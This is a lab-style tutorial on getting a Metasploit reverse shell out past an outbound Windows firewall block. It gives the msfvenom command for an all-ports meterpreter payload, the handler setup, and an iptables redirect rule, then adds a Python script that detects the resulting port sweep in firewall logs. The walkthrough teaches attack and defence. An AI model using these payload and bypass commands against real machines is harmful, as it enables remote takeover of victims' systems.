Introduction

Network Address Translation "generally involves re-writing the source and/or destination addresses of IP packets as they pass through a router or firewall" (from http://en.wikipedia.org/wiki/Network_Address_Translation).

The Linux kernel usually possesses a packet filter framework called netfilter (project home: netfilter.org). This framework enables a Linux machine with an appropriate number of network cards (interfaces) to become a router capable of NAT. We will use the command-line utility 'iptables' to create complex rules for modification and filtering of packets. The important rules regarding NAT are - not very surprisingly - found in the 'nat' table. This table has three predefined chains: PREROUTING, OUTPUT and POSTROUTING.
ALL-PORTS payload:

‘reverse_tcp’ only allows a connection to one port, so if the victim has blocked all outgoing connections except a few ports, it becomes difficult for the attacker to pick a port for listening. ‘reverse_tcp_allports’ is used to brute-force all the ports from 1-65535.
We use iptables to reroute any incoming connection to the listening port.
Let’s begin

We use metasploit to create a meterpreter reverse shell.

msfvenom -p windows/meterpreter/reverse_tcp_allports lhost=192.168.1.139 lport=4444 -f exe > reverse_shell.exe
We now set up our listener using metasploit.

msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp_allports
msf exploit(multi/handler) > set lhost 192.168.1.139
msf exploit(multi/handler) > set lport 4444
msf exploit(multi/handler) > run
Now we set up the firewall on our Windows machine. We open Windows Firewall and select Outbound Rules.

We select "Port" to define the ports we need to block.

We select TCP to block TCP packets, and enter the port range 4444-5555.

Now we select ‘Block the connection’ to block all outgoing traffic to these ports.

Now we select the types of connection (profiles) the firewall rule applies to.

We now name the firewall rule “REVERSE_SHELL” and click Finish.
Now we define an iptables rule to reroute all traffic arriving on ports 4444-5556 to port 4444, so that when the reverse shell tries to connect to our system on port 5556 it is rerouted to port 4444 (the REDIRECT target takes the option --to-ports; the original post's en dash in “–to-port” would be rejected by iptables):

iptables -t nat -A PREROUTING -p tcp --dport 4444:5556 -j REDIRECT --to-ports 4444
As soon as the victim runs the file we get our reverse shell.
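Because the all-ports payload walks through consecutive destination ports until one gets out, a host with an outbound block rule like the one above leaves a distinctive trace in its own firewall log: a run of DROP records to successive TCP ports on a single peer, ending in an ALLOW on the first unblocked port. The following Python script is an added example, not part of the original post and not Metasploit's or Microsoft's code, that parses Windows Firewall text-log (pfirewall.log) records and reports such runs. The log lines, hosts and timestamps are constructed, the blocked range is shortened to 4444-4448 for readability (the post's rule blocks 4444-5555), and the `min_run` and `window` thresholds are assumptions to tune per environment.

```python
"""
Detecting the port sweep that an "all ports" reverse shell leaves in an
egress-filtering host's firewall log.

Input format: Windows Firewall text log (pfirewall.log). All log lines,
addresses and timestamps below are constructed for this example.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Column names from the "#Fields:" header of pfirewall.log.
FIELDS = ("date time action protocol src-ip dst-ip src-port dst-port size "
          "tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path").split()

# Constructed sample: 192.168.1.50 (example victim) has an outbound block rule
# covering 4444-4448 (shortened from the post's 4444-5555). The sweep towards
# 192.168.1.139 is interleaved with ordinary DNS and HTTPS traffic.
SAMPLE_LOG = """\
#Version: 1.5
#Software: Microsoft Windows Firewall
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path
2024-03-01 10:00:00 ALLOW UDP 192.168.1.50 192.168.1.1 51000 53 60 - - - - - - - SEND
2024-03-01 10:00:00 ALLOW TCP 192.168.1.50 93.184.216.34 49150 443 52 S 1000 0 8192 - - - SEND
2024-03-01 10:00:01 DROP TCP 192.168.1.50 192.168.1.139 49151 4444 52 S 1001 0 8192 - - - SEND
2024-03-01 10:00:01 DROP TCP 192.168.1.50 192.168.1.139 49151 4444 52 S 1001 0 8192 - - - SEND
2024-03-01 10:00:02 DROP TCP 192.168.1.50 192.168.1.139 49152 4445 52 S 1002 0 8192 - - - SEND
2024-03-01 10:00:03 DROP TCP 192.168.1.50 192.168.1.139 49153 4446 52 S 1003 0 8192 - - - SEND
2024-03-01 10:00:04 DROP TCP 192.168.1.50 192.168.1.139 49154 4447 52 S 1004 0 8192 - - - SEND
2024-03-01 10:00:05 DROP TCP 192.168.1.50 192.168.1.139 49155 4448 52 S 1005 0 8192 - - - SEND
2024-03-01 10:00:06 ALLOW TCP 192.168.1.50 192.168.1.139 49156 4449 52 S 1006 0 8192 - - - SEND
2024-03-01 10:00:07 ALLOW TCP 192.168.1.139 192.168.1.50 4449 49156 52 AS 2000 1007 8192 - - - RECEIVE
"""


def parse_line(line):
    """Parse one pfirewall.log record into a dict; None for blank, comment or malformed lines."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    parts = line.split()
    if len(parts) != len(FIELDS):
        return None
    rec = dict(zip(FIELDS, parts))
    rec["ts"] = datetime.strptime(f"{rec['date']} {rec['time']}", "%Y-%m-%d %H:%M:%S")
    rec["dst-port"] = int(rec["dst-port"]) if rec["dst-port"].isdigit() else None
    return rec


def find_port_sweeps(lines, min_run=5, window=timedelta(seconds=30)):
    """
    Report runs of outbound TCP attempts from one source to consecutive
    destination ports on one peer, each attempt within `window` of the
    previous one. SYN retransmissions to the same port do not break a run.
    Returns a list of (src_ip, dst_ip, first_port, last_port, last_action);
    last_action is "ALLOW" when the sweep ended in a permitted connection.
    """
    attempts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["protocol"] != "TCP" or rec["path"] != "SEND":
            continue                      # only outbound TCP is of interest
        if rec["dst-port"] is None:
            continue
        attempts[(rec["src-ip"], rec["dst-ip"])].append(
            (rec["ts"], rec["dst-port"], rec["action"]))

    findings = []
    for (src, dst), events in attempts.items():
        events.sort()                     # chronological, then by port
        run = [events[0]]
        for ev in events[1:]:
            prev = run[-1]
            if ev[1] == prev[1]:          # retransmission to the same port
                continue
            if ev[1] == prev[1] + 1 and ev[0] - prev[0] <= window:
                run.append(ev)            # next consecutive port, in time
                continue
            if len(run) >= min_run:
                findings.append((src, dst, run[0][1], run[-1][1], run[-1][2]))
            run = [ev]                    # start a fresh run
        if len(run) >= min_run:
            findings.append((src, dst, run[0][1], run[-1][1], run[-1][2]))
    return findings


if __name__ == "__main__":
    for src, dst, first, last, outcome in find_port_sweeps(SAMPLE_LOG.splitlines()):
        print(f"{src} swept TCP {first}-{last} on {dst}; last attempt {outcome}")
```

On the constructed log the script reports one sweep, 4444-4449 from 192.168.1.50 to 192.168.1.139 ending in ALLOW, and stays silent on the DNS and HTTPS records. The same five fields (source, destination, port, time, verdict) exist in most flow and firewall logs, so the run-detection logic carries over unchanged; only `parse_line` is format-specific.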